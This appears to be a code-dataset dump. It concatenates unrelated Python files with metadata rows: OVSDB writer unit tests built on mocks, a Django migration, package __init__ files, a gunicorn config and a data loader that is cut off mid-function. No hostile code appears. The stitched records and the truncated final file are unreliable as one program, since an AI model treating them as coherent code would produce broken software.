{'op': 'select',
'table': 'Ucast_Macs_Local',
'where': [['MAC', '==', 'fake_port_mac']]}],
'id': self.op_id}
return_value_raw = '{"id":1,"result":[{"rows":[{"_version":["uuid",' \
'"fake_v_uuid"],"locator":["uuid",' \
'"fake_locator_uuid"],"logical_switch":["uuid",' \
'"fake_ls_uuid"],"_uuid":["uuid","fake_uuid"],' \
'"MAC":"fake_port_mac","ipaddr":""}]}],"error":' \
'null}'
return_value = return_value_raw.replace(':null', ':None')
self.fake_ovsdb.response = ast.literal_eval(return_value)
expected_result = [{'MAC': 'fake_port_mac',
'_uuid': ['uuid', 'fake_uuid'],
'_version': ['uuid', 'fake_v_uuid'],
'ipaddr': '',
'locator': ['uuid', 'fake_locator_uuid'],
'logical_switch': ['uuid', 'fake_ls_uuid']}]
with mock.patch.object(ovsdb_writer.OVSDBWriter, '_recv_data',
return_value=return_value_raw), \
mock.patch.object(random, 'getrandbits',
return_value=self.op_id) as get_rand, \
mock.patch.object(ovsdb_writer.OVSDBWriter,
'_send_and_receive') as send_n_receive, \
mock.patch.object(ovsdb_writer.LOG,
'debug'):
result = self.fake_ovsdb.get_ucast_macs_local('fake_port_mac')
get_rand.assert_called_with(128)
send_n_receive.assert_called_with(query, self.op_id, True)
self.assertEqual(result, expected_result)
self.fake_ovsdb.responses = [self.fake_message]
def test_delete_ucast_macs_local(self):
"""Test case to test delete_ucast_macs_local."""
commit_dict = {'op': 'commit', 'durable': True}
query = {'method': 'transact',
'params': [n_const.OVSDB_SCHEMA_NAME,
{'op': 'delete',
'table': 'Ucast_Macs_Local',
'where': [['MAC', '==', 'fake_MAC_value']]},
commit_dict],
'id': self.op_id}
with mock.patch.object(random, 'getrandbits',
return_value=self.op_id) as get_rand, \
mock.patch.object(ovsdb_writer.OVSDBWriter,
'_send_and_receive') as send_n_receive, \
mock.patch.object(ovsdb_writer.LOG,
'debug'):
self.fake_ovsdb.delete_ucast_macs_local('fake_MAC_value')
get_rand.assert_called_with(128)
send_n_receive.assert_called_with(query, self.op_id, True)
def test_get_physical_locator_uuid(self):
"""Test case to test get_physical_locator_uuid."""
query = {'method': 'transact',
'params': [n_const.OVSDB_SCHEMA_NAME,
{'op': 'select',
'table': 'Physical_Locator',
'where': [['dst_ip', '==', 'fake_dst_ip']]}],
'id': self.op_id}
return_value_raw = '{"id":1,"result":[{"rows":[{"_version":' \
'["uuid","abcd"],"_uuid":["uuid",' \
'"fake_physical_locator_uuid"],"dst_ip":' \
'"fake_dst_ip","encapsulation_type":' \
'"vxlan_over_ipv4"}]}],"error":null}'
return_value = return_value_raw.replace(':null', ':None')
self.fake_ovsdb.response = ast.literal_eval(return_value)
expected_result = 'fake_physical_locator_uuid'
with mock.patch.object(ovsdb_writer.OVSDBWriter, '_recv_data',
return_value=return_value_raw), \
mock.patch.object(random, 'getrandbits',
return_value=self.op_id) as get_rand, \
mock.patch.object(ovsdb_writer.OVSDBWriter,
'_send_and_receive') as send_n_receive, \
mock.patch.object(ovsdb_writer.LOG,
'debug'):
result = self.fake_ovsdb.get_physical_locator_uuid(
'fake_dst_ip')
get_rand.assert_called_with(128)
send_n_receive.assert_called_with(query, self.op_id, True)
self.assertEqual(result, expected_result)
self.fake_ovsdb.responses = [self.fake_message]
def test_insert_ucast_macs_local(self):
"""Test case to test insert_ucast_macs_local."""
commit_dict = {'op': 'commit', 'durable': True}
query = {'method': 'transact',
'params': [n_const.OVSDB_SCHEMA_NAME,
{'op': 'insert',
'table': 'Ucast_Macs_Local',
'row': {'MAC': 'fake_MAC_value',
'logical_switch': [
'uuid',
'fake_logical_switch_uuid'],
'locator': ['uuid',
'fake_locator_uuid']}},
commit_dict],
'id': self.op_id}
with mock.patch.object(random, 'getrandbits',
return_value=self.op_id) as get_rand, \
mock.patch.object(ovsdb_writer.OVSDBWriter,
'_send_and_receive') as send_n_receive, \
mock.patch.object(ovsdb_writer.LOG,
'debug'):
self.fake_ovsdb.insert_ucast_macs_local(
'fake_logical_switch_uuid', 'fake_locator_uuid',
'fake_MAC_value')
get_rand.assert_called_with(128)
send_n_receive.assert_called_with(query, self.op_id, True)
def test_insert_ucast_macs_local_and_locator(self):
"""Test case to test insert_ucast_macs_local_and_locator."""
commit_dict = {'op': 'commit', 'durable': True}
query = {'method': 'transact',
'params': [n_const.OVSDB_SCHEMA_NAME,
{'op': 'insert',
'table': 'Physical_Locator',
'row': {'dst_ip': 'fake_locator_ip',
'encapsulation_type': 'vxlan_over_ipv4'
}, 'uuid-name': 'RVTEP'},
{'op': 'insert',
'table': 'Ucast_Macs_Local',
'row': {'MAC': 'fake_MAC_value',
'logical_switch': [
'uuid',
'fake_logical_switch_uuid'],
'locator': ['named-uuid', 'RVTEP']}},
commit_dict],
'id': self.op_id}
with mock.patch.object(random, 'getrandbits',
return_value=self.op_id) as get_rand, \
mock.patch.object(ovsdb_writer.OVSDBWriter,
'_send_and_receive') as send_n_receive, \
mock.patch.object(ovsdb_writer.LOG,
'debug'):
self.fake_ovsdb.insert_ucast_macs_local_and_locator(
'fake_logical_switch_uuid', 'fake_locator_ip',
'fake_MAC_value')
get_rand.assert_called_with(128)
send_n_receive.assert_called_with(query, self.op_id, True)
def test_get_ucast_macs_remote(self):
"""Test case to test get_ucast_macs_remote."""
query = {'method': 'transact',
'params': [n_const.OVSDB_SCHEMA_NAME,
{'op': 'select',
'table': 'Ucast_Macs_Remote',
'where': [['MAC', '==', 'fake_port_mac']]}],
'id': self.op_id}
return_value_raw = '{"id":1,"result":[{"rows":[{"_version":["uuid",' \
'"fake_v_uuid"],"locator":["uuid",' \
'"fake_locator_uuid"],"logical_switch":["uuid",' \
'"fake_ls_uuid"],"_uuid":["uuid","fake_uuid"],' \
'"MAC":"fake_port_mac","ipaddr":"fake_ipaddr"' \
'}]}],"error":null}'
return_value = return_value_raw.replace(':null', ':None')
self.fake_ovsdb.response = ast.literal_eval(return_value)
expected_result = [{'MAC': 'fake_port_mac',
'_uuid': ['uuid', 'fake_uuid'],
'_version': ['uuid', 'fake_v_uuid'],
'ipaddr': 'fake_ipaddr',
'locator': ['uuid', 'fake_locator_uuid'],
'logical_switch': ['uuid', 'fake_ls_uuid']}]
with mock.patch.object(ovsdb_writer.OVSDBWriter, '_recv_data',
return_value=return_value_raw), \
mock.patch.object(random, 'getrandbits',
return_value=self.op_id) as get_rand, \
mock.patch.object(ovsdb_writer.OVSDBWriter,
'_send_and_receive') as send_n_receive, \
mock.patch.object(ovsdb_writer.LOG,
'debug'):
result = self.fake_ovsdb.get_ucast_macs_remote(
'fake_port_mac')
get_rand.assert_called_with(128)
send_n_receive.assert_called_with(query, self.op_id, True)
self.assertEqual(result, expected_result)
self.fake_ovsdb.responses = [self.fake_message]
def test_delete_ucast_macs_remote(self):
"""Test case to test delete_ucast_macs_remote."""
commit_dict = {'op': 'commit', 'durable': True}
query = {'method': 'transact',
'params': [n_const.OVSDB_SCHEMA_NAME,
{'op': 'delete',
'table': 'Ucast_Macs_Remote',
'where': [['MAC', '==', 'fake_MAC_value']]},
commit_dict],
'id': self.op_id}
with mock.patch.object(random, 'getrandbits',
return_value=self.op_id) as get_rand, \
mock.patch.object(ovsdb_writer.OVSDBWriter,
'_send_and_receive') as send_n_receive, \
mock.patch.object(ovsdb_writer.LOG,
'debug'):
self.fake_ovsdb.delete_ucast_macs_remote(
'fake_MAC_value')
get_rand.assert_called_with(128)
send_n_receive.assert_called_with(query, self.op_id, True)
def test_insert_ucast_macs_remote(self):
"""Test case to test insert_ucast_macs_remote."""
commit_dict = {'op': 'commit', 'durable': True}
query = {'method': 'transact',
'params': [n_const.OVSDB_SCHEMA_NAME,
{'op': 'insert',
'table': 'Ucast_Macs_Remote',
'row': {'MAC': 'fake_MAC_value',
'logical_switch': [
'uuid',
'fake_logical_switch_uuid'],
'locator': ['uuid', 'fake_locator_uuid'],
'ipaddr': 'fake_ipaddr1'}},
{'op': 'insert',
'table': 'Ucast_Macs_Remote',
'row': {'MAC': 'fake_MAC_value',
'logical_switch': [
'uuid',
'fake_logical_switch_uuid'],
'locator': ['uuid', 'fake_locator_uuid'],
'ipaddr': 'fake_ipaddr2'}},
commit_dict],
'id': self.op_id}
with mock.patch.object(random, 'getrandbits',
return_value=self.op_id) as get_rand, \
mock.patch.object(ovsdb_writer.OVSDBWriter,
'_send_and_receive') as send_n_receive, \
mock.patch.object(ovsdb_writer.LOG,
'debug'):
self.fake_ovsdb.insert_ucast_macs_remote(
'fake_logical_switch_uuid', 'fake_MAC_value',
self.fake_ipaddrs, 'fake_locator_uuid', mock.ANY)
get_rand.assert_called_with(128)
send_n_receive.assert_called_with(query, self.op_id, True)
def test_insert_ucast_macs_remote_and_locator(self):
"""Test case to test insert_ucast_macs_remote_and_locator."""
commit_dict = {'op': 'commit', 'durable': True}
query = {'method': 'transact',
'params': [n_const.OVSDB_SCHEMA_NAME,
{'op': 'insert',
'table': 'Physical_Locator',
'row': {'dst_ip': 'fake_locator_ip',
'encapsulation_type': 'vxlan_over_ipv4'
}, 'uuid-name': 'RVTEP'},
{'op': 'insert',
'table': 'Ucast_Macs_Remote',
'row': {'MAC': 'fake_MAC_value',
'logical_switch': [
'uuid',
'fake_logical_switch_uuid'],
'locator': ['named-uuid', 'RVTEP'],
'ipaddr': 'fake_ipaddr1'}},
{'op': 'insert',
'table': 'Ucast_Macs_Remote',
'row': {'MAC': 'fake_MAC_value',
'logical_switch': [
'uuid',
'fake_logical_switch_uuid'],
'locator': ['named-uuid', 'RVTEP'],
'ipaddr': 'fake_ipaddr2'}},
commit_dict],
'id': self.op_id}
with mock.patch.object(random, 'getrandbits',
return_value=self.op_id) as get_rand, \
mock.patch.object(ovsdb_writer.OVSDBWriter,
'_send_and_receive') as send_n_receive, \
mock.patch.object(ovsdb_writer.LOG,
'debug'):
self.fake_ovsdb.insert_ucast_macs_remote_and_locator(
'fake_logical_switch_uuid', 'fake_MAC_value',
self.fake_ipaddrs, 'fake_locator_ip', mock.ANY)
get_rand.assert_called_with(128)
send_n_receive.assert_called_with(query, self.op_id, True)
def test_reset_physical_port(self):
"""Test case to test reset_physical_port."""
commit_dict = {'op': 'commit', 'durable': True}
query = {'method': 'transact',
'params': [n_const.OVSDB_SCHEMA_NAME,
{'op': 'update',
'table': 'Physical_Port',
'where': [['name', '==', 'fake_port_name']],
'row': {'vlan_bindings': ['map', []]}},
commit_dict],
'id': self.op_id}
with mock.patch.object(random, 'getrandbits',
return_value=self.op_id) as get_rand, \
mock.patch.object(ovsdb_writer.OVSDBWriter,
'_send_and_receive') as send_n_receive, \
mock.patch.object(ovsdb_writer.LOG,
'debug'):
self.fake_ovsdb.reset_physical_port(
'fake_port_name')
get_rand.assert_called_with(128)
send_n_receive.assert_called_with(query, self.op_id, True)
# def test_get_logical_switch_uuid_return_none(self):
# """Test case to test get_logical_switch_uuid but none returned."""
# return_value_raw = '{"id":1,"result":[{"rows":[]}],"error":null}'
# return_value_raw = return_value_raw.replace(':null', ':None')
# return_value_dict = ast.literal_eval(return_value_raw)
# self.fake_ovsdb.responses = [return_value_dict]
# with mock.patch.object(ovsdb_writer.OVSDBWriter, '_recv_data',
# return_value=return_value_raw):
# with mock.patch.object(random, 'getrandbits',
# return_value=self.op_id):
# with mock.patch.object(ovsdb_writer.OVSDBWriter,
# '_send_and_receive'):
# with mock.patch.object(ovsdb_writer.LOG, 'debug'):
# self.assertRaises(
# IndexError,
# self.fake_ovsdb.get_logical_switch_uuid,
# self.op_id)
# self.fake_ovsdb.responses = [self.fake_message]
# def test_get_physical_locator_uuid_return_none(self):
# """Test case to test get_physical_locator_uuid but none returned."""
# return_value_raw = '{"id":1,"result":[{"rows":[]}],"error":null}'
# return_value_raw = return_value_raw.replace(':null', ':None')
# return_value_dict = ast.literal_eval(return_value_raw)
# self.fake_ovsdb.responses = [return_value_dict]
# with mock.patch.object(ovsdb_writer.OVSDBWriter, '_recv_data',
# return_value=return_value_raw):
# with mock.patch.object(random, 'getrandbits',
# return_value=self.op_id):
# with mock.patch.object(ovsdb_writer.OVSDBWriter,
# '_send_and_receive'):
# with mock.patch.object(ovsdb_writer.LOG, 'debug'):
# self.assertRaises(
# IndexError,
# self.fake_ovsdb.get_logical_switch_uuid,
# self.op_id)
# self.fake_ovsdb.responses = [self.fake_message]
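
The tests above repeat one patching idiom: temporarily replace an attribute with mock.patch.object, exercise the code, then assert on the recorded call. A minimal self-contained sketch of that idiom follows, using the standard-library unittest.mock rather than the external mock package (the API is the same); the class and test names are illustrative only.

import random
import unittest
from unittest import mock

class PatchObjectIdiom(unittest.TestCase):
    def test_getrandbits_is_stubbed(self):
        # Inside the with-block, random.getrandbits returns the canned
        # value and records how it was called.
        with mock.patch.object(random, 'getrandbits',
                               return_value='abcd') as get_rand:
            op_id = random.getrandbits(128)
        get_rand.assert_called_with(128)
        self.assertEqual(op_id, 'abcd')

if __name__ == '__main__':
    unittest.main()
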
| 51.732316
| 81
| 0.498673
| 3,634
| 37,299
| 4.757843
| 0.072647
| 0.043725
| 0.072007
| 0.068248
| 0.863852
| 0.834586
| 0.817987
| 0.789879
| 0.765471
| 0.743031
| 0
| 0.00884
| 0.390386
| 37,299
| 720
| 82
| 51.804167
| 0.751561
| 0.102576
| 0
| 0.70084
| 0
| 0
| 0.168501
| 0.050433
| 0
| 0
| 0
| 0
| 0.094118
| 1
| 0.047059
| false
| 0
| 0.018487
| 0
| 0.067227
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5075097a66c566c9a55a174572987cce26ced8de
| 107
|
py
|
Python
|
dynamic_rules/__init__.py
|
Dchouras/dynamic_rules
|
6d2e202c86f1ea5c94010b058c9dacec2c943087
|
[
"MIT"
] | null | null | null |
dynamic_rules/__init__.py
|
Dchouras/dynamic_rules
|
6d2e202c86f1ea5c94010b058c9dacec2c943087
|
[
"MIT"
] | null | null | null |
dynamic_rules/__init__.py
|
Dchouras/dynamic_rules
|
6d2e202c86f1ea5c94010b058c9dacec2c943087
|
[
"MIT"
] | 1
|
2020-05-17T23:26:10.000Z
|
2020-05-17T23:26:10.000Z
|
from dynamic_rules.rule_engine import evaluate_rules
from dynamic_rules.rule_processing import load_rules
| 26.75
| 52
| 0.897196
| 16
| 107
| 5.625
| 0.5625
| 0.244444
| 0.355556
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.084112
| 107
| 3
| 53
| 35.666667
| 0.918367
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
50bcd98a444bb101bf107b50823a6f811af06bbf
| 178
|
py
|
Python
|
CDRTR/core/DeepModel/__init__.py
|
caoyulong/CDRTR
|
f61cf84c096a124066af90f6536d85be630ecdff
|
[
"BSD-2-Clause"
] | 9
|
2019-07-05T14:49:25.000Z
|
2021-05-12T13:37:19.000Z
|
CDRTR/core/DeepModel/__init__.py
|
caoyulong/CDRTR
|
f61cf84c096a124066af90f6536d85be630ecdff
|
[
"BSD-2-Clause"
] | null | null | null |
CDRTR/core/DeepModel/__init__.py
|
caoyulong/CDRTR
|
f61cf84c096a124066af90f6536d85be630ecdff
|
[
"BSD-2-Clause"
] | 1
|
2021-02-13T14:00:26.000Z
|
2021-02-13T14:00:26.000Z
|
from .basic import cnn_text
from .basic import factorization_machine
from .basic import embedding_layer, embedding_lookup
from .basic import EncDec, Encoder, Decoder, AutoEncDec
| 35.6
| 55
| 0.842697
| 24
| 178
| 6.083333
| 0.583333
| 0.246575
| 0.410959
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.11236
| 178
| 4
| 56
| 44.5
| 0.924051
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
50d2cc345b5ab53761ac1b8fe92b6afe74bc2a2d
| 149
|
py
|
Python
|
boxflow/interface/holoviews.py
|
ioam/flowbox
|
197b51c665e0de5266c0710e904fdfb733c95375
|
[
"BSD-3-Clause"
] | 15
|
2017-03-17T08:20:20.000Z
|
2021-04-24T16:32:52.000Z
|
boxflow/interface/holoviews.py
|
ioam/flowbox
|
197b51c665e0de5266c0710e904fdfb733c95375
|
[
"BSD-3-Clause"
] | 2
|
2017-10-10T10:08:36.000Z
|
2018-04-03T23:38:30.000Z
|
boxflow/interface/holoviews.py
|
ioam/boxflow
|
197b51c665e0de5266c0710e904fdfb733c95375
|
[
"BSD-3-Clause"
] | null | null | null |
# Module adapting holoviews classes for use with boxflow
#
#
from __future__ import absolute_import
import holoviews
def load_holoviews():
pass
| 16.555556
| 56
| 0.791946
| 19
| 149
| 5.894737
| 0.789474
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.167785
| 149
| 8
| 57
| 18.625
| 0.903226
| 0.362416
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0.25
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
50deb81cb14ac8093bafb537620d8dd76df82646
| 217
|
py
|
Python
|
ctd_processing/ctd_files/seabird/__init__.py
|
sharksmhi/ctd_processing
|
616df4cd7ed626b678622448a08a0356086a8a3f
|
[
"MIT"
] | null | null | null |
ctd_processing/ctd_files/seabird/__init__.py
|
sharksmhi/ctd_processing
|
616df4cd7ed626b678622448a08a0356086a8a3f
|
[
"MIT"
] | null | null | null |
ctd_processing/ctd_files/seabird/__init__.py
|
sharksmhi/ctd_processing
|
616df4cd7ed626b678622448a08a0356086a8a3f
|
[
"MIT"
] | null | null | null |
from .bl_file import *
from .hdr_file import *
from .modify import *
from .file_pattern_nodc import *
from .sbe_parent_class import *
from .file_pattern_nodc import *
from .file_pattern_old_processing_script import *
| 27.125
| 49
| 0.806452
| 33
| 217
| 4.939394
| 0.424242
| 0.368098
| 0.257669
| 0.386503
| 0.429448
| 0.429448
| 0.429448
| 0
| 0
| 0
| 0
| 0
| 0.129032
| 217
| 7
| 50
| 31
| 0.862434
| 0
| 0
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0fa082d1178472699ce1840f4e0f330820d55f9c
| 168
|
py
|
Python
|
sidekick/api/views/__init__.py
|
cybera/netbox-sidekick
|
ec5e2080513d088e2604d8755f34b1d2592b95dd
|
[
"Apache-2.0"
] | 3
|
2020-09-07T12:14:31.000Z
|
2021-11-11T11:46:43.000Z
|
sidekick/api/views/__init__.py
|
cybera/netbox-sidekick
|
ec5e2080513d088e2604d8755f34b1d2592b95dd
|
[
"Apache-2.0"
] | null | null | null |
sidekick/api/views/__init__.py
|
cybera/netbox-sidekick
|
ec5e2080513d088e2604d8755f34b1d2592b95dd
|
[
"Apache-2.0"
] | null | null | null |
from .device import DeviceCheckAccessView # noqa: F401
from .map import FullMapViewSet # noqa: F401
from .nic import NICListView # noqa: F401
| 42
| 55
| 0.666667
| 18
| 168
| 6.222222
| 0.555556
| 0.214286
| 0.214286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.07438
| 0.279762
| 168
| 3
| 56
| 56
| 0.85124
| 0.190476
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0fa606f8bbb2c063f90f4df17fc98ad233d4bb61
| 3,104
|
py
|
Python
|
dashboard/covid/migrations/0019_auto_20210131_2030.py
|
guiyshd/new-dashboard
|
78e43b066f153a902514a97a7e66349d2ffc9f36
|
[
"MIT"
] | null | null | null |
dashboard/covid/migrations/0019_auto_20210131_2030.py
|
guiyshd/new-dashboard
|
78e43b066f153a902514a97a7e66349d2ffc9f36
|
[
"MIT"
] | null | null | null |
dashboard/covid/migrations/0019_auto_20210131_2030.py
|
guiyshd/new-dashboard
|
78e43b066f153a902514a97a7e66349d2ffc9f36
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.1.5 on 2021-01-31 23:30
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('covid', '0018_auto_20210128_1109'),
]
operations = [
migrations.AlterField(
model_name='wcotabasenacional',
name='city',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='wcotabasenacional',
name='cod_regiaodesaude',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='wcotabasenacional',
name='country',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='wcotabasenacional',
name='date',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='wcotabasenacional',
name='deaths',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='wcotabasenacional',
name='deaths_by_totalcases',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='wcotabasenacional',
name='deaths_per_100k_inhabitants',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='wcotabasenacional',
name='field_source',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='wcotabasenacional',
name='ibgeid',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='wcotabasenacional',
name='last_info_date',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='wcotabasenacional',
name='name_regiaodesaude',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='wcotabasenacional',
name='newcases',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='wcotabasenacional',
name='newdeaths',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='wcotabasenacional',
name='state',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='wcotabasenacional',
name='totalcases',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='wcotabasenacional',
name='totalcases_per_100k_inhabitants',
field=models.FloatField(blank=True, null=True),
),
]
| 33.021277
| 61
| 0.572165
| 266
| 3,104
| 6.556391
| 0.203008
| 0.183486
| 0.229358
| 0.266055
| 0.856078
| 0.856078
| 0.827408
| 0.827408
| 0.827408
| 0.827408
| 0
| 0.017436
| 0.316366
| 3,104
| 93
| 62
| 33.376344
| 0.80443
| 0.014497
| 0
| 0.735632
| 1
| 0
| 0.162905
| 0.026497
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.011494
| 0
| 0.045977
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
0fbc3a54fa54315d31607af5fa3c1e946e5072f8
| 915
|
py
|
Python
|
build/scripts/overnight/python/example_exceptions.py
|
brezillon/opensplice
|
725ae9d949c83fce1746bd7d8a154b9d0a81fe3e
|
[
"Apache-2.0"
] | 133
|
2017-11-09T02:10:00.000Z
|
2022-03-29T09:45:10.000Z
|
build/scripts/overnight/python/example_exceptions.py
|
brezillon/opensplice
|
725ae9d949c83fce1746bd7d8a154b9d0a81fe3e
|
[
"Apache-2.0"
] | 131
|
2017-11-07T14:48:43.000Z
|
2022-03-13T15:30:47.000Z
|
build/scripts/overnight/python/example_exceptions.py
|
brezillon/opensplice
|
725ae9d949c83fce1746bd7d8a154b9d0a81fe3e
|
[
"Apache-2.0"
] | 94
|
2017-11-09T02:26:19.000Z
|
2022-02-24T06:38:25.000Z
|
""" Exceptions module
    Defines the exceptions used
"""
class LogCheckFail(RuntimeError):
    """ Indicate a scenario failure.
    """
    def __init__(self, reason):
        """ Constructor
            Parameters:
                reason: string
                    the reason for the failure.
        """
        RuntimeError.__init__(self, reason)
class MissingExecutable(RuntimeError):
    """ Indicate a scenario failure.
    """
    def __init__(self, reason):
        """ Constructor
            Parameters:
                reason: string
                    the reason for the failure.
        """
        RuntimeError.__init__(self, reason)
class ExampleFail(RuntimeError):
    """ Indicate a scenario failure.
    """
    def __init__(self, reason):
        """ Constructor
            Parameters:
                reason: string
                    the reason for the failure.
        """
        RuntimeError.__init__(self, reason)
| 17.264151
| 43
| 0.569399
| 78
| 915
| 6.371795
| 0.282051
| 0.096579
| 0.169014
| 0.17505
| 0.828974
| 0.828974
| 0.828974
| 0.828974
| 0.828974
| 0.828974
| 0
| 0
| 0.335519
| 915
| 52
| 44
| 17.596154
| 0.817434
| 0.417486
| 0
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
e8533e28942d2ceb7cf3c65de23b4ef04a26b2b8
| 147
|
py
|
Python
|
gunicorn_config.py
|
rishipathak6/Aspire
|
3f9e9108eb7a887fcbbc6732288d0097bdf2e37c
|
[
"Apache-2.0"
] | null | null | null |
gunicorn_config.py
|
rishipathak6/Aspire
|
3f9e9108eb7a887fcbbc6732288d0097bdf2e37c
|
[
"Apache-2.0"
] | 3
|
2021-09-08T02:32:23.000Z
|
2022-03-12T00:49:20.000Z
|
gunicorn_config.py
|
rishipathak6/Aspire
|
3f9e9108eb7a887fcbbc6732288d0097bdf2e37c
|
[
"Apache-2.0"
] | 1
|
2019-10-19T08:11:08.000Z
|
2019-10-19T08:11:08.000Z
|
command = '/opt/django/aspire-django/env/bin/gunicorn'
pythonpath = '/opt/django/aspire-django/aspire_project'
bind = '127.0.0.1:8001'
workers = 3
| 29.4
| 55
| 0.741497
| 23
| 147
| 4.695652
| 0.695652
| 0.333333
| 0.277778
| 0.388889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081481
| 0.081633
| 147
| 4
| 56
| 36.75
| 0.718519
| 0
| 0
| 0
| 0
| 0
| 0.653061
| 0.557823
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e85a22e7d52a8fc8d048fce3abadd9d077eb41a3
| 1,406
|
py
|
Python
|
data_loader.py
|
BoykoMihail/marketBubblePrediction
|
beaaad50c709a6a4dffd4881e5648104a5c9d200
|
[
"MIT"
] | null | null | null |
data_loader.py
|
BoykoMihail/marketBubblePrediction
|
beaaad50c709a6a4dffd4881e5648104a5c9d200
|
[
"MIT"
] | null | null | null |
data_loader.py
|
BoykoMihail/marketBubblePrediction
|
beaaad50c709a6a4dffd4881e5648104a5c9d200
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import pkg_resources
import pandas as pd
def sp500_2017():
    stream = pkg_resources.resource_stream(__name__, 'data/sp500_2017.csv')
    return pd.read_csv(stream, encoding='latin-1')
def sp500_2000():
    stream = pkg_resources.resource_stream(__name__, 'data/sp500_2000.csv')
    return pd.read_csv(stream, encoding='latin-1')
def sp500_2019():
    stream = pkg_resources.resource_stream(__name__, 'data/sp500_2019.csv')
    return pd.read_csv(stream, encoding='latin-1')
def sp500_1990():
    stream = pkg_resources.resource_stream(__name__, 'data/sp500_1990.csv')
    return pd.read_csv(stream, encoding='latin-1')
def sp500_1970():
